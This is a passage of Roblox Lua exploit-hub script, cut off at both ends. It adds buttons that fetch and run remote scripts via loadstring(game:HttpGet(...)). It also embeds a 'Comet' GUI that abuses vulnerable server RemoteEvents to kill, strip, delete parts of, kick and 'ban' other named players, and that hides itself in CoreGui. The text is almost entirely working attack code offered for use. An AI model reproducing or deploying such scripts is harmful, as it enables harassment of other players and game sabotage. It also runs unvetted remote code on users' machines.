syn.protect_gui(BruUI.ScreenGui) end) BruUI.ScreenGui.Parent = CoreGui elseif gethui then local success,err = pcall(function() BruUI.ScreenGui.Parent = gethui() end) if not success and err then BruUI.ScreenGui.Parent = CoreGui end else BruUI.ScreenGui.Parent = CoreGui end end }) GUIS:AddButton({ Title = "Quirky Cmd", Description = "harked cmds?", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/qcmd.txt"))() end }) GUIS:AddButton({ Title = "Project ligma", Description = "sorta like harked", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/project%20ligma.txt"))() end }) GUIS:AddButton({ Title = "destruct hex fe gui", Description = "sorta like harked", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/destructhexfegui.txt"))() end }) GUIS:AddButton({ Title = "Zeroday", Description = "sorta like harked", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/zeroday/zeroday.lua"))() end }) GUIS:AddButton({ Title = "Comet", Description = "like harked", Callback = function() --[[ ☄️ Welcome to Comet ☄️ Feel free to look at the source ]] local CometGUI = Instance.new("ScreenGui") local Comet = Instance.new("Frame") local ForTheGUI = Instance.new("Folder") local Title = Instance.new("Folder") local co = Instance.new("TextLabel") local met = Instance.new("TextLabel") local Outline = Instance.new("Frame") local UICorner = Instance.new("UICorner") local TextLabel = Instance.new("TextLabel") local ButtonsAndOther = Instance.new("Folder") local OptionBackground = Instance.new("Frame") local UICorner_2 = Instance.new("UICorner") local Scroller = Instance.new("ScrollingFrame") local Ragdoll = Instance.new("TextButton") local UICorner_3 = Instance.new("UICorner") local RemoveTools = Instance.new("TextButton") local UICorner_4 = Instance.new("UICorner") local Naked = Instance.new("TextButton") local UICorner_5 = Instance.new("UICorner") local Kill = Instance.new("TextButton") local UICorner_6 = Instance.new("UICorner") local Box = Instance.new("TextButton") local UICorner_7 = Instance.new("UICorner") local Bald = Instance.new("TextButton") local UICorner_8 = Instance.new("UICorner") local Sink = Instance.new("TextButton") local UICorner_9 = Instance.new("UICorner") local Kick = Instance.new("TextButton") local UICorner_10 = Instance.new("UICorner") local NOFace = Instance.new("TextButton") local UICorner_11 = Instance.new("UICorner") local NoLimbs = Instance.new("TextButton") local UICorner_12 = Instance.new("UICorner") local Fat = Instance.new("TextButton") local UICorner_13 = Instance.new("UICorner") local Punish = Instance.new("TextButton") local UICorner_14 = Instance.new("UICorner") local Dex = Instance.new("TextButton") local UICorner_15 = Instance.new("UICorner") local Pantsless = Instance.new("TextButton") local UICorner_16 = Instance.new("UICorner") local Shirtless = Instance.new("TextButton") local UICorner_17 = Instance.new("UICorner") local Ban = Instance.new("TextButton") local UICorner_18 = Instance.new("UICorner") local NoAnims = Instance.new("TextButton") local UICorner_19 = Instance.new("UICorner") local NoRegen = Instance.new("TextButton") local UICorner_20 = Instance.new("UICorner") local Goto = Instance.new("TextButton") local UICorner_21 = Instance.new("UICorner") local Btools = Instance.new("TextButton") local UICorner_22 = Instance.new("UICorner") local Clearmap = Instance.new("TextButton") local UICorner_23 = Instance.new("UICorner") local ClearGuis = Instance.new("TextButton") local UICorner_24 = Instance.new("UICorner") local Unview = Instance.new("TextButton") local UICorner_25 = Instance.new("UICorner") local View = Instance.new("TextButton") local UICorner_26 = Instance.new("UICorner") local Stools = Instance.new("TextButton") local UICorner_27 = Instance.new("UICorner") local Target = Instance.new("TextBox") local UICorner_28 = Instance.new("UICorner") local UICorner_29 = Instance.new("UICorner") --Properties: CometGUI.Name = "CometGUI" CometGUI.Parent = game:GetService("CoreGui") CometGUI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Comet.Name = "Comet" Comet.Parent = CometGUI Comet.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Comet.BackgroundTransparency = 0.120 Comet.Position = UDim2.new(0.381188124, 0, 0.311258256, 0) Comet.Size = UDim2.new(0, 481, 0, 289) ForTheGUI.Name = "ForTheGUI" ForTheGUI.Parent = Comet Title.Name = "Title" Title.Parent = ForTheGUI co.Name = "co" co.Parent = Title co.BackgroundColor3 = Color3.fromRGB(255, 255, 255) co.BackgroundTransparency = 1.000 co.Position = UDim2.new(0.386694342, 0, 0.0103806229, 0) co.Size = UDim2.new(0, 67, 0, 33) co.Font = Enum.Font.SourceSansBold co.Text = "CO" co.TextColor3 = Color3.fromRGB(255, 255, 255) co.TextSize = 36.000 co.TextWrapped = true met.Name = "met" met.Parent = Title met.BackgroundColor3 = Color3.fromRGB(255, 255, 255) met.BackgroundTransparency = 1.000 met.Position = UDim2.new(0.513513505, 0, 0.0103805698, 0) met.Size = UDim2.new(0, 35, 0, 33) met.Font = Enum.Font.SourceSansBold met.Text = "MET" met.TextColor3 = Color3.fromRGB(102, 0, 255) met.TextSize = 36.000 Outline.Name = "Outline" Outline.Parent = ForTheGUI Outline.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Outline.Position = UDim2.new(0.00207900209, 0, 0.124567471, 0) Outline.Size = UDim2.new(0, 478, 0, 1) UICorner.Parent = Outline TextLabel.Parent = ForTheGUI TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.Position = UDim2.new(0.0145530142, 0, 0.958477616, 0) TextLabel.Size = UDim2.new(0, 465, 0, 11) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "Join the discord to get a list of working games | https://discord.gg/ACk4JyVJ6x" TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextScaled = true TextLabel.TextSize = 14.000 TextLabel.TextWrapped = true ButtonsAndOther.Name = "ButtonsAndOther" ButtonsAndOther.Parent = Comet OptionBackground.Name = "OptionBackground" OptionBackground.Parent = ButtonsAndOther OptionBackground.BackgroundColor3 = Color3.fromRGB(0, 0, 0) OptionBackground.BackgroundTransparency = 0.700 OptionBackground.Position = UDim2.new(0.0311850309, 0, 0.162629753, 0) OptionBackground.Size = UDim2.new(0, 450, 0, 194) UICorner_2.Parent = OptionBackground Scroller.Name = "Scroller" Scroller.Parent = OptionBackground Scroller.Active = true Scroller.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Scroller.BackgroundTransparency = 1.000 Scroller.BorderSizePixel = 0 Scroller.Size = UDim2.new(0, 450, 0, 194) Scroller.CanvasSize = UDim2.new(0, 0, 3, 0) Scroller.ScrollBarThickness = 3 Ragdoll.Name = "Ragdoll" Ragdoll.Parent = Scroller Ragdoll.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Ragdoll.BackgroundTransparency = 0.300 Ragdoll.Position = UDim2.new(0.362222224, 0, 0.0996563658, 0) Ragdoll.Size = UDim2.new(0, 123, 0, 33) Ragdoll.Font = Enum.Font.SourceSansBold Ragdoll.Text = "Ragdoll" Ragdoll.TextColor3 = Color3.fromRGB(255, 255, 255) Ragdoll.TextSize = 18.000 UICorner_3.Parent = Ragdoll RemoveTools.Name = "RemoveTools" RemoveTools.Parent = Scroller RemoveTools.BackgroundColor3 = Color3.fromRGB(102, 0, 255) RemoveTools.BackgroundTransparency = 0.300 RemoveTools.Position = UDim2.new(0.657777786, 0, 0.0996563658, 0) RemoveTools.Size = UDim2.new(0, 123, 0, 33) RemoveTools.Font = Enum.Font.SourceSansBold RemoveTools.Text = "Remove Tools" RemoveTools.TextColor3 = Color3.fromRGB(255, 255, 255) RemoveTools.TextSize = 18.000 UICorner_4.Parent = RemoveTools Naked.Name = "Naked" Naked.Parent = Scroller Naked.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Naked.BackgroundTransparency = 0.300 Naked.Position = UDim2.new(0.0666666627, 0, 0.0996563658, 0) Naked.Size = UDim2.new(0, 123, 0, 33) Naked.Font = Enum.Font.SourceSansBold Naked.Text = "Naked" Naked.TextColor3 = Color3.fromRGB(255, 255, 255) Naked.TextSize = 18.000 UICorner_5.Parent = Naked Kill.Name = "Kill" Kill.Parent = Scroller Kill.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Kill.BackgroundTransparency = 0.300 Kill.Position = UDim2.new(0.0666666627, 0, 0.0231958777, 0) Kill.Size = UDim2.new(0, 123, 0, 33) Kill.Font = Enum.Font.SourceSansBold Kill.Text = "Kill" Kill.TextColor3 = Color3.fromRGB(255, 255, 255) Kill.TextSize = 18.000 UICorner_6.Parent = Kill Box.Name = "Box" Box.Parent = Scroller Box.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Box.BackgroundTransparency = 0.300 Box.Position = UDim2.new(0.657777786, 0, 0.0231958777, 0) Box.Size = UDim2.new(0, 123, 0, 33) Box.Font = Enum.Font.SourceSansBold Box.Text = "Box" Box.TextColor3 = Color3.fromRGB(255, 255, 255) Box.TextSize = 18.000 UICorner_7.Parent = Box Bald.Name = "Bald" Bald.Parent = Scroller Bald.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Bald.BackgroundTransparency = 0.300 Bald.Position = UDim2.new(0.364444435, 0, 0.0231958777, 0) Bald.Size = UDim2.new(0, 123, 0, 33) Bald.Font = Enum.Font.SourceSansBold Bald.Text = "Bald" Bald.TextColor3 = Color3.fromRGB(255, 255, 255) Bald.TextSize = 18.000 UICorner_8.Parent = Bald Sink.Name = "Sink" Sink.Parent = Scroller Sink.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Sink.BackgroundTransparency = 0.300 Sink.Position = UDim2.new(0.657777786, 0, 0.243986294, 0) Sink.Size = UDim2.new(0, 123, 0, 33) Sink.Font = Enum.Font.SourceSansBold Sink.Text = "Sink" Sink.TextColor3 = Color3.fromRGB(255, 255, 255) Sink.TextSize = 18.000 UICorner_9.Parent = Sink Kick.Name = "Kick" Kick.Parent = Scroller Kick.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Kick.BackgroundTransparency = 0.300 Kick.Position = UDim2.new(0.362222224, 0, 0.243986294, 0) Kick.Size = UDim2.new(0, 123, 0, 33) Kick.Font = Enum.Font.SourceSansBold Kick.Text = "Kick" Kick.TextColor3 = Color3.fromRGB(255, 255, 255) Kick.TextSize = 18.000 UICorner_10.Parent = Kick NOFace.Name = "NOFace" NOFace.Parent = Scroller NOFace.BackgroundColor3 = Color3.fromRGB(102, 0, 255) NOFace.BackgroundTransparency = 0.300 NOFace.Position = UDim2.new(0.0666666627, 0, 0.243986294, 0) NOFace.Size = UDim2.new(0, 123, 0, 33) NOFace.Font = Enum.Font.SourceSansBold NOFace.Text = "No face" NOFace.TextColor3 = Color3.fromRGB(255, 255, 255) NOFace.TextSize = 18.000 UICorner_11.Parent = NOFace NoLimbs.Name = "NoLimbs" NoLimbs.Parent = Scroller NoLimbs.BackgroundColor3 = Color3.fromRGB(102, 0, 255) NoLimbs.BackgroundTransparency = 0.300 NoLimbs.Position = UDim2.new(0.0666666627, 0, 0.174398631, 0) NoLimbs.Size = UDim2.new(0, 123, 0, 33) NoLimbs.Font = Enum.Font.SourceSansBold NoLimbs.Text = "No Limbs" NoLimbs.TextColor3 = Color3.fromRGB(255, 255, 255) NoLimbs.TextSize = 18.000 UICorner_12.Parent = NoLimbs Fat.Name = "Fat" Fat.Parent = Scroller Fat.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Fat.BackgroundTransparency = 0.300 Fat.Position = UDim2.new(0.364444435, 0, 0.174398631, 0) Fat.Size = UDim2.new(0, 123, 0, 33) Fat.Font = Enum.Font.SourceSansBold Fat.Text = "Fat" Fat.TextColor3 = Color3.fromRGB(255, 255, 255) Fat.TextSize = 18.000 UICorner_13.Parent = Fat Punish.Name = "Punish" Punish.Parent = Scroller Punish.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Punish.BackgroundTransparency = 0.300 Punish.Position = UDim2.new(0.657777786, 0, 0.174398631, 0) Punish.Size = UDim2.new(0, 123, 0, 33) Punish.Font = Enum.Font.SourceSansBold Punish.Text = "Punish" Punish.TextColor3 = Color3.fromRGB(255, 255, 255) Punish.TextSize = 18.000 UICorner_14.Parent = Punish Dex.Name = "Dex" Dex.Parent = Scroller Dex.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Dex.BackgroundTransparency = 0.300 Dex.Position = UDim2.new(0.364444435, 0, 0.312714785, 0) Dex.Size = UDim2.new(0, 123, 0, 33) Dex.Font = Enum.Font.SourceSansBold Dex.Text = "Dex" Dex.TextColor3 = Color3.fromRGB(255, 255, 255) Dex.TextSize = 18.000 UICorner_15.Parent = Dex Pantsless.Name = "Pantsless" Pantsless.Parent = Scroller Pantsless.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Pantsless.BackgroundTransparency = 0.300 Pantsless.Position = UDim2.new(0.362222224, 0, 0.387457073, 0) Pantsless.Size = UDim2.new(0, 123, 0, 33) Pantsless.Font = Enum.Font.SourceSansBold Pantsless.Text = "Pantsless" Pantsless.TextColor3 = Color3.fromRGB(255, 255, 255) Pantsless.TextSize = 18.000 UICorner_16.Parent = Pantsless Shirtless.Name = "Shirtless" Shirtless.Parent = Scroller Shirtless.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Shirtless.BackgroundTransparency = 0.300 Shirtless.Position = UDim2.new(0.0666666627, 0, 0.387457073, 0) Shirtless.Size = UDim2.new(0, 123, 0, 33) Shirtless.Font = Enum.Font.SourceSansBold Shirtless.Text = "Shirtless" Shirtless.TextColor3 = Color3.fromRGB(255, 255, 255) Shirtless.TextSize = 18.000 UICorner_17.Parent = Shirtless Ban.Name = "Ban" Ban.Parent = Scroller Ban.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Ban.BackgroundTransparency = 0.300 Ban.Position = UDim2.new(0.0666666627, 0, 0.312714785, 0) Ban.Size = UDim2.new(0, 123, 0, 33) Ban.Font = Enum.Font.SourceSansBold Ban.Text = "Ban" Ban.TextColor3 = Color3.fromRGB(255, 255, 255) Ban.TextSize = 18.000 UICorner_18.Parent = Ban NoAnims.Name = "NoAnims" NoAnims.Parent = Scroller NoAnims.BackgroundColor3 = Color3.fromRGB(102, 0, 255) NoAnims.BackgroundTransparency = 0.300 NoAnims.Position = UDim2.new(0.657777786, 0, 0.312714785, 0) NoAnims.Size = UDim2.new(0, 123, 0, 33) NoAnims.Font = Enum.Font.SourceSansBold NoAnims.Text = "No animations" NoAnims.TextColor3 = Color3.fromRGB(255, 255, 255) NoAnims.TextSize = 18.000 UICorner_19.Parent = NoAnims NoRegen.Name = "NoRegen" NoRegen.Parent = Scroller NoRegen.BackgroundColor3 = Color3.fromRGB(102, 0, 255) NoRegen.BackgroundTransparency = 0.300 NoRegen.Position = UDim2.new(0.657777786, 0, 0.387457073, 0) NoRegen.Size = UDim2.new(0, 123, 0, 33) NoRegen.Font = Enum.Font.SourceSansBold NoRegen.Text = "No regen" NoRegen.TextColor3 = Color3.fromRGB(255, 255, 255) NoRegen.TextSize = 18.000 UICorner_20.Parent = NoRegen Goto.Name = "Goto" Goto.Parent = Scroller Goto.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Goto.BackgroundTransparency = 0.300 Goto.Position = UDim2.new(0.0666666627, 0, 0.457903832, 0) Goto.Size = UDim2.new(0, 123, 0, 33) Goto.Font = Enum.Font.SourceSansBold Goto.Text = "Goto" Goto.TextColor3 = Color3.fromRGB(255, 255, 255) Goto.TextSize = 18.000 UICorner_21.Parent = Goto Btools.Name = "Btools" Btools.Parent = Scroller Btools.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Btools.BackgroundTransparency = 0.300 Btools.Position = UDim2.new(0.362222224, 0, 0.457903832, 0) Btools.Size = UDim2.new(0, 123, 0, 33) Btools.Font = Enum.Font.SourceSansBold Btools.Text = "Btools" Btools.TextColor3 = Color3.fromRGB(255, 255, 255) Btools.TextSize = 18.000 UICorner_22.Parent = Btools Clearmap.Name = "Clearmap" Clearmap.Parent = Scroller Clearmap.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Clearmap.BackgroundTransparency = 0.300 Clearmap.Position = UDim2.new(0.657777786, 0, 0.457903832, 0) Clearmap.Size = UDim2.new(0, 123, 0, 33) Clearmap.Font = Enum.Font.SourceSansBold Clearmap.Text = "Clear map" Clearmap.TextColor3 = Color3.fromRGB(255, 255, 255) Clearmap.TextSize = 18.000 UICorner_23.Parent = Clearmap ClearGuis.Name = "ClearGuis" ClearGuis.Parent = Scroller ClearGuis.BackgroundColor3 = Color3.fromRGB(102, 0, 255) ClearGuis.BackgroundTransparency = 0.300 ClearGuis.Position = UDim2.new(0.0666666627, 0, 0.528350532, 0) ClearGuis.Size = UDim2.new(0, 123, 0, 33) ClearGuis.Font = Enum.Font.SourceSansBold ClearGuis.Text = "Clear Guis" ClearGuis.TextColor3 = Color3.fromRGB(255, 255, 255) ClearGuis.TextSize = 18.000 UICorner_24.Parent = ClearGuis Unview.Name = "Unview" Unview.Parent = Scroller Unview.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Unview.BackgroundTransparency = 0.300 Unview.Position = UDim2.new(0.657777786, 0, 0.528350532, 0) Unview.Size = UDim2.new(0, 123, 0, 33) Unview.Font = Enum.Font.SourceSansBold Unview.Text = "Unview" Unview.TextColor3 = Color3.fromRGB(255, 255, 255) Unview.TextSize = 18.000 UICorner_25.Parent = Unview View.Name = "View" View.Parent = Scroller View.BackgroundColor3 = Color3.fromRGB(102, 0, 255) View.BackgroundTransparency = 0.300 View.Position = UDim2.new(0.362222224, 0, 0.528350532, 0) View.Size = UDim2.new(0, 123, 0, 33) View.Font = Enum.Font.SourceSansBold View.Text = "View" View.TextColor3 = Color3.fromRGB(255, 255, 255) View.TextSize = 18.000 UICorner_26.Parent = View Stools.Name = "Stools" Stools.Parent = Scroller Stools.BackgroundColor3 = Color3.fromRGB(102, 0, 255) Stools.BackgroundTransparency = 0.300 Stools.Position = UDim2.new(0.0666666627, 0, 0.602233708, 0) Stools.Size = UDim2.new(0, 123, 0, 33) Stools.Font = Enum.Font.SourceSansBold Stools.Text = "Stools" Stools.TextColor3 = Color3.fromRGB(255, 255, 255) Stools.TextSize = 18.000 UICorner_27.Parent = Stools Target.Name = "Target" Target.Parent = ButtonsAndOther Target.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Target.BackgroundTransparency = 0.700 Target.Position = UDim2.new(0.290251851, 0, 0.869992554, 0) Target.Size = UDim2.new(0, 200, 0, 22) Target.Font = Enum.Font.SourceSans Target.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) Target.PlaceholderText = "Enter username here" Target.Text = "" Target.TextColor3 = Color3.fromRGB(255, 255, 255) Target.TextSize = 14.000 UICorner_28.Parent = Target UICorner_29.Parent = Comet -- [[ CODE ]] Players = game:GetService("Players") SupportedGame = false -- Check to see if comet supports the current game you're in -- messy code function Destroy(part) spawn(function() if game:GetService("ReplicatedStorage"):FindFirstChild("DeleteCar") then SupportedGame = true game:GetService("ReplicatedStorage").DeleteCar:FireServer(part) elseif game:GetService("Players").LocalPlayer.Character:FindFirstChild("HandlessSegway") then SupportedGame = true for i,slaves in pairs(game:GetDescendants()) do if slaves.Name == "DestroySegway" then slaves:FireServer(part, {Value = part}) end end elseif game:GetService("ReplicatedStorage"):FindFirstChild("GuiHandler") then SupportedGame = true game:GetService("ReplicatedStorage").GuiHandler:FireServer(false, part) elseif game:GetService("Players").LocalPlayer.Backpack:FindFirstChild("Building Tools") then SupportedGame = true local args = { [1] = "Remove", [2] = { [1] = part } } game:GetService("Players").LocalPlayer.Backpack:FindFirstChild("Building Tools").SyncAPI.ServerEndpoint:InvokeServer(unpack(args)) end end) end Destroy(aas) function splitString(str,delim) local broken = {} if delim == nil then delim = "," end for w in string.gmatch(str,"[^"..delim.."]+") do table.insert(broken,w) end return broken end function toTokens(str) local tokens = {} for op,name in string.gmatch(str,"([+-])([^+-]+)") do table.insert(tokens,{Operator = op,Name = name}) end return tokens end function getRoot(char) local rootPart = char:FindFirstChild('HumanoidRootPart') or char:FindFirstChild('Torso') or char:FindFirstChild('UpperTorso') return rootPart end local WTS = function(Object) local ObjectVector = game:GetService("Workspace").CurrentCamera:WorldToScreenPoint(Object.Position) return Vector2.new(ObjectVector.X, ObjectVector.Y) end local mouse = Players.LocalPlayer:GetMouse() local MousePositionToVector2 = function() return Vector2.new(mouse.X, mouse.Y) end local GetClosestPlayerFromCursor = function() local found = nil local ClosestDistance = math.huge for i, v in pairs(Players:GetPlayers()) do if v ~= Players.LocalPlayer and v.Character and v.Character:FindFirstChildOfClass("Humanoid") then for k, x in pairs(v.Character:GetChildren()) do if string.find(x.Name, "Torso") then local Distance = (WTS(x) - MousePositionToVector2()).Magnitude if Distance < ClosestDistance then ClosestDistance = Distance found = v end end end end end return found end local SpecialPlayerCases = { ["all"] = function(speaker) return Players:GetPlayers() end, ["others"] = function(speaker) local plrs = {} for i,v in pairs(Players:GetPlayers()) do if v ~= speaker then table.insert(plrs,v) end end return plrs end, ["me"] = function(speaker)return {speaker} end, ["#(%d+)"] = function(speaker,args,currentList) local returns = {} local randAmount = tonumber(args[1]) local players = {unpack(currentList)} for i = 1,randAmount do if #players == 0 then break end local randIndex = math.random(1,#players) table.insert(returns,players[randIndex]) table.remove(players,randIndex) end return returns end, ["random"] = function(speaker,args,currentList) local players = Players:GetPlayers() local localplayer = Players.LocalPlayer table.remove(players, table.find(players, localplayer)) return {players[math.random(1,#players)]} end, ["%%(.+)"] = function(speaker,args) local returns = {} local team = args[1] for _,plr in pairs(Players:GetPlayers()) do if plr.Team and string.sub(string.lower(plr.Team.Name),1,#team) == string.lower(team) then table.insert(returns,plr) end end return returns end, ["allies"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team == team then table.insert(returns,plr) end end return returns end, ["enemies"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team ~= team then table.insert(returns,plr) end end return returns end, ["team"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team == team then table.insert(returns,plr) end end return returns end, ["nonteam"] = function(speaker) local returns = {} local team = speaker.Team for _,plr in pairs(Players:GetPlayers()) do if plr.Team ~= team then table.insert(returns,plr) end end return returns end, ["friends"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr:IsFriendsWith(speaker.UserId) and plr ~= speaker then table.insert(returns,plr) end end return returns end, ["nonfriends"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if not plr:IsFriendsWith(speaker.UserId) and plr ~= speaker then table.insert(returns,plr) end end return returns end, ["guests"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Guest then table.insert(returns,plr) end end return returns end, ["bacons"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Character:FindFirstChild('Pal Hair') or plr.Character:FindFirstChild('Kate Hair') then table.insert(returns,plr) end end return returns end, ["age(%d+)"] = function(speaker,args) local returns = {} local age = tonumber(args[1]) if not age == nil then return end for _,plr in pairs(Players:GetPlayers()) do if plr.AccountAge <= age then table.insert(returns,plr) end end return returns end, ["nearest"] = function(speaker,args,currentList) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end local lowest = math.huge local NearestPlayer = nil for _,plr in pairs(currentList) do if plr ~= speaker and plr.Character then local distance = plr:DistanceFromCharacter(getRoot(speakerChar).Position) if distance < lowest then lowest = distance NearestPlayer = {plr} end end end return NearestPlayer end, ["farthest"] = function(speaker,args,currentList) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end local highest = 0 local Farthest = nil for _,plr in pairs(currentList) do if plr ~= speaker and plr.Character then local distance = plr:DistanceFromCharacter(getRoot(speakerChar).Position) if distance > highest then highest = distance Farthest = {plr} end end end return Farthest end, ["group(%d+)"] = function(speaker,args) local returns = {} local groupID = tonumber(args[1]) for _,plr in pairs(Players:GetPlayers()) do if plr:IsInGroup(groupID) then table.insert(returns,plr) end end return returns end, ["alive"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if plr.Character and plr.Character:FindFirstChildOfClass("Humanoid") and plr.Character:FindFirstChildOfClass("Humanoid").Health > 0 then table.insert(returns,plr) end end return returns end, ["dead"] = function(speaker,args) local returns = {} for _,plr in pairs(Players:GetPlayers()) do if (not plr.Character or not plr.Character:FindFirstChildOfClass("Humanoid")) or plr.Character:FindFirstChildOfClass("Humanoid").Health <= 0 then table.insert(returns,plr) end end return returns end, ["rad(%d+)"] = function(speaker,args) local returns = {} local radius = tonumber(args[1]) local speakerChar = speaker.Character if not speakerChar or not getRoot(speakerChar) then return end for _,plr in pairs(Players:GetPlayers()) do if plr.Character and getRoot(plr.Character) then local magnitude = (getRoot(plr.Character).Position-getRoot(speakerChar).Position).magnitude if magnitude <= radius then table.insert(returns,plr) end end end return returns end, ["cursor"] = function(speaker) local plrs = {} local v = GetClosestPlayerFromCursor() if v ~= nil then table.insert(plrs, v) end return plrs end, } function onlyIncludeInTable(tab,matches) local matchTable = {} local resultTable = {} for i,v in pairs(matches) do matchTable[v.Name] = true end for i,v in pairs(tab) do if matchTable[v.Name] then table.insert(resultTable,v) end end return resultTable end function removeTableMatches(tab,matches) local matchTable = {} local resultTable = {} for i,v in pairs(matches) do matchTable[v.Name] = true end for i,v in pairs(tab) do if not matchTable[v.Name] then table.insert(resultTable,v) end end return resultTable end function getPlayersByName(Name) local Name,Len,Found = string.lower(Name),#Name,{} for _,v in pairs(Players:GetPlayers()) do if Name:sub(0,1) == '@' then if string.sub(string.lower(v.Name),1,Len-1) == Name:sub(2) then table.insert(Found,v) end else if string.sub(string.lower(v.Name),1,Len) == Name or string.sub(string.lower(v.DisplayName),1,Len) == Name then table.insert(Found,v) end end end return Found end function getPlayer(list,speaker) if list == nil then return {speaker.Name} end local nameList = splitString(list,",") local foundList = {} for _,name in pairs(nameList) do if string.sub(name,1,1) ~= "+" and string.sub(name,1,1) ~= "-" then name = "+"..name end local tokens = toTokens(name) local initialPlayers = Players:GetPlayers() for i,v in pairs(tokens) do if v.Operator == "+" then local tokenContent = v.Name local foundCase = false for regex,case in pairs(SpecialPlayerCases) do local matches = {string.match(tokenContent,"^"..regex.."$")} if #matches > 0 then foundCase = true initialPlayers = onlyIncludeInTable(initialPlayers,case(speaker,matches,initialPlayers)) end end if not foundCase then initialPlayers = onlyIncludeInTable(initialPlayers,getPlayersByName(tokenContent)) end else local tokenContent = v.Name local foundCase = false for regex,case in pairs(SpecialPlayerCases) do local matches = {string.match(tokenContent,"^"..regex.."$")} if #matches > 0 then foundCase = true initialPlayers = removeTableMatches(initialPlayers,case(speaker,matches,initialPlayers)) end end if not foundCase then initialPlayers = removeTableMatches(initialPlayers,getPlayersByName(tokenContent)) end end end for i,v in pairs(initialPlayers) do table.insert(foundList,v) end end local foundNames = {} for i,v in pairs(foundList) do table.insert(foundNames,v.Name) end return foundNames end -- [[ BUTTON SCRIPTS ]] Kill.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character.Torso.Neck) else Destroy(Players[v].Character.Head.Neck) end end end) Naked.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) end end) Box.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("Accessory") then Destroy(v) end end for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("CharacterMesh") then Destroy(v) end end Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) Destroy(Players[v].Character["Left Arm"]) Destroy(Players[v].Character["Left Leg"]) Destroy(Players[v].Character["Right Arm"]) Destroy(Players[v].Character["Right Leg"]) Destroy(Players[v].Character.Head:FindFirstChildOfClass("SpecialMesh")) Destroy(Players[v].Character.Head:FindFirstChildOfClass("Decal")) end end) Sink.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.HumanoidRootPart) end end) function FindInTable(tbl,val) if tbl == nil then return false end for _,v in pairs(tbl) do if v == val then return true end end return false end local slockk = false local banned = {} Players.PlayerAdded:connect(function(plr) if slockk then Destroy(plr) end if FindInTable(banned, plr.UserId) then Destroy(plr) end end) Ban.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do table.insert(banned, Players[v].UserId) Destroy(Players[v]) end end) Dex.MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/infyiff/backup/main/dex.lua"))() end) Ragdoll.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid")) end end) RemoveTools.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v]:FindFirstChildOfClass("Backpack"):GetChildren()) do Destroy(v) end end end) NOFace.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.Head:FindFirstChildOfClass("Decal")) end end) Punish.MouseButton1Click:Connect(function() 